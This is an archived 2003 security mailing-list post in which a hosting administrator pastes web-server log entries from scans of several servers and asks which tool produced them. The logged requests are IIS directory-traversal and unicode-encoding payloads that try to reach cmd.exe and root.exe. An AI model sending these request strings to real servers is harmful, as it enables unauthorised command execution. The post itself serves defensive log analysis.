Hosting Provided By

Anyone know this tool?

From: Danny <danny(at)eboundary.com>
Date: Mon Jul 28 2003 - 23:24:16 EDT

Does anyone happen to know what tool this is? I've seen the exact same scans on 6 of our servers on completely different networks. All the scans have been from different source IP's and all the servers were hit within a space of a few hours.

Curiosity is getting the better of me since i've never seen this exact pattern before :)

64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"

64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET  

/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"


64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET

/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"

64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET  


/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"


64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET

/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../
winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
"-"
64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
"-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
"-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
"-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-"
"-"

64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET  

/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"


64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET

/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
"-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:43 -0500] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"

Danny
Work - http://www.eBoundary.com - Secure, FreeBSD hosting. Play - http://www.eBoundary.net - Who really sets your electronic boundaries?
AIM: eBoundaryTch | ICQ: 3090141

Received on Tue Jul 29 13:00:17 2003

This message: [ Message body ]
Next message: Paul Tinsley: "RE: Exploit for Windows RPC may be in the wild!"
Previous message: Paul Tinsley: "RE: Exploit for Windows RPC may be in the wild!"
In reply to: Shafik Yaghmour: "Re: "access_log?hello" ?"
In reply to Mark Embrich: "New attack or old Vulnerability Scanner?"
Next in thread: Jason Rumney: "Re: Anyone know this tool?"
Reply: Jason Rumney: "Re: Anyone know this tool?"
Reply: James Williams: "RE: Anyone know this tool?"
Reply: Jason Falciola: "Re: Anyone know this tool?"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:02:14 EDT